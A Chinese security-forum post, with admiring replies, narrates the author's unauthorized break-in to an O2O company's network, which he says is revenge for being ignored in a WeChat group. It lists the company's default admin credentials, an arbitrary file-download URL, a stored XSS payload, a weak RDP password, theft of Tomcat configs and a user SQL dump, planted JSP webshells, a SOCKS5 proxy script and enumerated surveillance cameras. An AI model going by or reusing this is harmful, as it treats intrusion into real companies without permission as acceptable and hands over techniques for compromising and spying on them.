请选择 进入手机版 | 继续访问电脑版

SSS安全论坛

 找回密码
 立即注册

QQ登录

只需一步,快速开始

产品
产品
团队
团队
版规
版规
查看: 4565|回复: 135

[原创文章] 渗透O2O内网全过程

  [复制链接]
  • TA的每日心情
    开心
    2016-2-2 20:06
  • 签到天数: 12 天

    [LV.3]偶尔看看II

    发表于 2016-12-20 14:30:54 | 显示全部楼层 |阅读模式
    作者SSS核心: kris
    漏洞挖掘:
    O2O公司,他们公司几个高管在一个微信群看到过,有时看到这个公司一些推文,我主动AT他们没有理我,我感觉我被无视了,居然还无视搞渗透的人,于是想其做一次渗透,惩罚一下不重视信息安全的人。

    http://wuye.xxxxxx.com 物业后台 IP12*.***.***.174
    通过管理后台的测试账号进去看了下,对拿shell和获取敏感信息没什么帮助。
    http://wuye.xxxxxx.com/cb/sys/gotoIndex.do#/gotoPage/we_chat_setting
    http://wuye.xxxxxx.com/cb/  物业后台,有默认账号密码

    loginName:ty_wy
    loginPwd:888888
    QQ图片20161220141527.png
    2.png
    于是转战下个子域:
    http://mobile.xxxxxxxx.com/qa/
    http://mobile.xxxxxxxx.com/public/accessDenied.jsp

    文件连接居然是物理地址。。。
    http://mobile.xxxxxx.com/front/showImage.do?imgAddress=D:/var/upload/imgs/good/1445226710843.jpg   可任意下载
    3.png
    收获地址处储存和反射xss
    http://mobile.xxxxxxx.com/front/address/list.do?1=1&certificate=1&authorizer=bl
    11</span><img/src=1 onerror=(alert(1))><span>
    4.png
    http://mobile.******.com/front/forum/member/index.do?1=1&mid=09cb90cb-e15c-41de-a86e-a8ca5a888e3e&certificate=1&authorizer=bl  个人中心
    5.png
    点击空白修改背景,抓包上传jsp
    http://mobile.xxxxxxx.com/front/showImage.do?imgAddress=D:/var/upload/imgs/forum/members/centerBg/1461816682215.jsp
    直接下载,但无法执行,很难猜测磁盘文件, 没什么收获。

    点击空白修改背景,抓包上传jsp
    http://mobile.xxxxxxx.com/front/showImage.do?imgAddress=D:/var/upload/imgs/forum/members/centerBg/1461816682215.jsp
    直接下载,但无法执行,很难猜测磁盘文件, 没什么收获。
    6.png
    192.168.1.1863389失败
    192.168.1.1373389失败
    192.168.1.13780 ok
    7.png
    三个MAC地址相似,可能有关联
    8.png
    下面是一些外网IP
    9.png
    发现12x.xxx.xxx.161是外网网关,对网关IP端口扫描没什么发现
    10.png
    从路由器的登录日志看到,内网17636有登录过,我认为目标可能跟这两个很近了。。
    11.png
    DHCP地址是192.168.1.131开始,所以131之前的都是手动,可能是服务器IP,还有199后的。

    12.png
    内网WEB服务器沦陷
    确定wuye.xxxxx.com WEB服务器在192.168.1.36,我把它的3389映射出来,连接发现是win7系统。
    通过弱口令成功进入Administrator  123456
    还挂载这移动硬盘,这安全意识够底,但后来我发现他这WEB服务器和程序居然放在移动硬盘。
    13.png
    14.png
    服务器有1433\3306svn
    这个192.168.1.36主机名:USER-20141128RF
    15.png
    16.png
    居然是空密码,然后开下外联
    17.png
    18.png
    19.png
    20.png

    Tomcat配置信息
    21.png
    22.png
    23.png
    浏览器可能会有痕迹
    24.png
    25.png
    目标jsp代码,整个Tomcatjsp代码居然都放在移动硬盘里
    26.png
    在我的文档下有个sys_user.sql
    27.png
    28.png

    WEB服务器Getshell 29.png

    网站程序物理地址
    F:\xxx***xxx\Tomcat\webapps\cb\
    30.png

    放了两个jsp一句话进去
    31.png

    数个视频监控设备


    32.png
    这个ds和其他设备可能是监控和打印机啥的,然后打开这个ds是海康威视监控
    33.png
    那些设备都是海康威视的,内网IP都是192.168.1.2xx
    分别是251208206201204202203205257  都是80端口
    34.png
    35.png
    这个华为的网关设备
    36.png
    http://xxx.***.com/docs/config/value.jsp  socket5正向代理脚本
    37.png
    然后本地看下这家公司办公环境。。。这个时候算下班时间了。
    38.png

    回复有彩蛋

    游客,如果您要查看本帖隐藏内容请回复

    评分

    参与人数 1好评 +2 收起 理由
    95zz + 2 你屌大

    查看全部评分

    回复

    使用道具 举报

  • TA的每日心情
    奋斗
    2017-1-8 22:07
  • 签到天数: 32 天

    [LV.5]常住居民I

    发表于 2016-12-20 14:51:17 | 显示全部楼层
    厉害厉害
    回复

    使用道具 举报

  • TA的每日心情
    慵懒
    2016-12-25 01:58
  • 签到天数: 19 天

    [LV.4]偶尔看看III

    发表于 2016-12-20 15:03:47 | 显示全部楼层
    菜单彩蛋
    回复

    使用道具 举报

  • TA的每日心情

    2017-2-12 23:32
  • 签到天数: 132 天

    [LV.7]常住居民III

    发表于 2016-12-20 15:28:30 | 显示全部楼层
    厉害厉害厉害厉害
  • TA的每日心情
    奋斗
    2017-2-8 00:17
  • 签到天数: 36 天

    [LV.5]常住居民I

    发表于 2016-12-20 15:50:36 | 显示全部楼层
    我去,扒的够彻底的
    头像被屏蔽
  • TA的每日心情

    2016-12-26 13:38
  • 签到天数: 19 天

    [LV.4]偶尔看看III

    发表于 2016-12-20 16:42:54 | 显示全部楼层
    提示: 作者被禁止或删除 内容自动屏蔽
  • TA的每日心情
    擦汗
    13 小时前
  • 签到天数: 274 天

    [LV.8]以坛为家I

    发表于 2016-12-20 17:13:05 | 显示全部楼层

    厉害厉害厉害厉害
  • TA的每日心情
    擦汗
    22 小时前
  • 签到天数: 308 天

    [LV.8]以坛为家I

    发表于 2016-12-20 17:32:11 | 显示全部楼层
    看到没有人接都说你鸡B大!
  • TA的每日心情
    慵懒
    3 天前
  • 签到天数: 29 天

    [LV.4]偶尔看看III

    发表于 2016-12-20 17:37:31 | 显示全部楼层
    跟着大牛学姿势
    头像被屏蔽
  • TA的每日心情
    慵懒
    2016-12-25 14:41
  • 签到天数: 33 天

    [LV.5]常住居民I

    发表于 2016-12-20 17:42:03 | 显示全部楼层
    提示: 作者被禁止或删除 内容自动屏蔽
    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    关闭

    站长推荐上一条 /1 下一条

    关注微信赢邀请码

    QQ|Archiver|手机版|网站地图|网页地图|SSS安全论坛 ( 黔ICP备15010987号  

    GMT+8, 2017-2-25 23:46 , Processed in 0.537074 second(s), 35 queries .

    Powered by SSS团队 X3.2

    © 2014-2015 Comsenz Inc.

    快速回复 返回顶部 返回列表